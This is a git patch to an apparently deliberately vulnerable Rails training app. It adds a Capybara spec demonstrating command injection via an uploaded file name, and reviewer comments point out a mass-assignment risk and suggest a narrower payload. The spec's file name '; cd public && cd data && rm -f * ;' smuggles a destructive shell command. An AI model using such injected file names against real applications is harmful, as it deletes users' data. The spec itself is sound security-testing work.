From e0bca0139ef9e7a791600b13b3ea8cbb07f73c89 Mon Sep 17 00:00:00 2001
From: chrismo
Date: Fri, 27 Sep 2013 14:59:30 -0500
Subject: [PATCH] Added command injection Capybara spec.

---
 app/controllers/users_controller.rb | 5 +---
 app/models/user.rb | 11 +++++--
 spec/features/command_injection_spec.rb | 39 +++++++++++++++++++++++++
 3 files changed, 49 insertions(+), 6 deletions(-)
 create mode 100644 spec/features/command_injection_spec.rb

diff --git a/app/controllers/users_controller.rb b/app/controllers/users_controller.rb
index b52a43b..d5ae600 100755
--- a/app/controllers/users_controller.rb
+++ b/app/controllers/users_controller.rb
@@ -9,10 +9,7 @@ class UsersController < ApplicationController
 def create
 user = User.new(params[:user])
- user.build_retirement(POPULATE_RETIREMENTS.shuffle.first)
- user.build_paid_time_off(POPULATE_PAID_TIME_OFF.shuffle.first).schedule.build(POPULATE_SCHEDULE.shuffle.first)
- user.build_work_info(POPULATE_WORK_INFO.shuffle.first)
- user.performance.build(POPULATE_PERFORMANCE.shuffle.first)
+ user.build_benefits_data
 if user.save
 session[:user_id] = user.user_id
 redirect_to home_dashboard_index_path
diff --git a/app/models/user.rb b/app/models/user.rb
index a9ecca8..c4b7f64 100755
--- a/app/models/user.rb
+++ b/app/models/user.rb
@@ -16,8 +16,15 @@ class User < ActiveRecord::Base
 has_one :paid_time_off, :foreign_key => :user_id, :primary_key => :user_id, :dependent => :destroy
 has_one :work_info, :foreign_key => :user_id, :primary_key => :user_id, :dependent => :destroy
 has_many :performance, :foreign_key => :user_id, :primary_key => :user_id, :dependent => :destroy
-
-
+
+
+ def build_benefits_data
+ build_retirement(POPULATE_RETIREMENTS.shuffle.first)
+ build_paid_time_off(POPULATE_PAID_TIME_OFF.shuffle.first).schedule.build(POPULATE_SCHEDULE.shuffle.first)
+ build_work_info(POPULATE_WORK_INFO.shuffle.first)
+ performance.build(POPULATE_PERFORMANCE.shuffle.first)
+ end
+
 private
 def full_name
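Review bot: `user.build_benefits_data` now runs against a record built straight from `User.new(params[:user])`, and nothing in this hunk restricts which attributes that call can set; since the next lines then trust `user.user_id` for the session (`session[:user_id] = user.user_id`), confirm that `user_id` (and any role-like column) is not mass-assignable, for example via `attr_accessible` in the model, otherwise a self-registration could claim another user's id. If that exposure is deliberate for this application, a comment on the `User.new(params[:user])` line saying so would save the next reader the investigation. The body of `create` continues past the end of the hunk.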
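Review bot: `build_benefits_data` is a new public method with no comment saying what it does or where its data comes from; it attaches randomly chosen rows from the `POPULATE_*` constants, so add `# Attach one randomly picked demo retirement, PTO (+schedule), work-info and performance record from the POPULATE_* fixtures; nothing is persisted until the user is saved.` above the `def`. Those constants were previously referenced only from `UsersController`; if they are defined inside that controller class rather than at top level or in an initializer they will not resolve from `User`, so confirm where they live. Style: each `.shuffle.first` is `Array#sample`, e.g. `build_retirement(POPULATE_RETIREMENTS.sample)`. The `User` class continues beyond this hunk.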
diff --git a/spec/features/command_injection_spec.rb b/spec/features/command_injection_spec.rb
new file mode 100644
index 0000000..186524a
--- /dev/null
+++ b/spec/features/command_injection_spec.rb
@@ -0,0 +1,39 @@
+require 'spec_helper'
+require 'tmpdir'
+
+feature 'command injection' do
+ before do
+ User.delete_all
+ Rails.application.load_seed
+ @normal_user = User.new(:first_name => 'Joe', :last_name => 'Schmoe',
+ :email => 'joe@schmoe.com', :password => 'aoeuaoeu', :password_confirmation => 'aoeuaoeu')
+ @normal_user.build_benefits_data
+ @normal_user.save!
+ end
+
+ scenario 'injection attack on file upload', :js => true do
+ visit '/'
+ within('.signup') do
+ fill_in 'email', :with => 'joe@schmoe.com'
+ fill_in 'password', :with => 'aoeuaoeu'
+ end
+ click_on 'Login'
+
+ legit_file = File.join(Rails.root, 'public', 'data', 'legit.txt')
+ File.open(legit_file, 'w') { |f| f.puts 'totes legit' }
+
+ visit "/users/#{@normal_user.user_id}/benefit_forms"
+ Dir.mktmpdir do |dir|
+ hackety_file = File.join(dir, '; cd public && cd data && rm -f * ;')
+ File.open(hackety_file, 'w') { |f| f.print 'mwahaha' }
+ within('.new_benefits') do
+ attach_file 'benefits_upload', hackety_file
+ find(:xpath, "//input[@id='benefits_backup']", :visible => false).set 'true'
+ end
+ save_screenshot('screenshot.before.upload.png')
+ click_on 'Start Upload'
+ end
+ save_screenshot('screenshot.after.upload.png')
+ File.exists?(legit_file).should be_false
+ end
+end
\ No newline at end of file
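Review bot: The payload on the `hackety_file` line runs `rm -f *` inside `public/data`, so every run of this spec deletes whatever is checked in there, and the `legit.txt` canary written to `public/data` is never removed when the assertion fails; narrow the payload to the canary (the name must stay slash-free so it can be created as a file, hence the `cd` chain) and add an `after` that removes it. `File.exists?` is deprecated in favour of `File.exist?`. The expectation `File.exists?(legit_file).should be_false` passes only while the upload handler, which is outside this diff, still hands the filename to a shell — presumably intended as a demonstration, but worth a comment such as `# Passes while the upload path is injectable; will fail once the filename is sanitised.` so a later fix does not read as a regression. The PNGs written by `save_screenshot` also land in the working directory with no cleanup.
```ruby
feature 'command injection' do
  # … unchanged: before block seeding @normal_user …

  after do
    # the payload is expected to delete the canary; clean up only if it survived
    File.delete(@legit_file) if @legit_file && File.exist?(@legit_file)
  end

  scenario 'injection attack on file upload', :js => true do
    # … unchanged: login steps …
    @legit_file = File.join(Rails.root, 'public', 'data', 'legit.txt')
    File.open(@legit_file, 'w') { |f| f.puts 'totes legit' }

    visit "/users/#{@normal_user.user_id}/benefit_forms"
    Dir.mktmpdir do |dir|
      # no slash in the name (it must be creatable as a file); delete only the canary, not all of public/data
      hackety_file = File.join(dir, '; cd public && cd data && rm -f legit.txt ;')
      # … unchanged: write payload file, attach, submit …
    end
    File.exist?(@legit_file).should be_false
  end
end
```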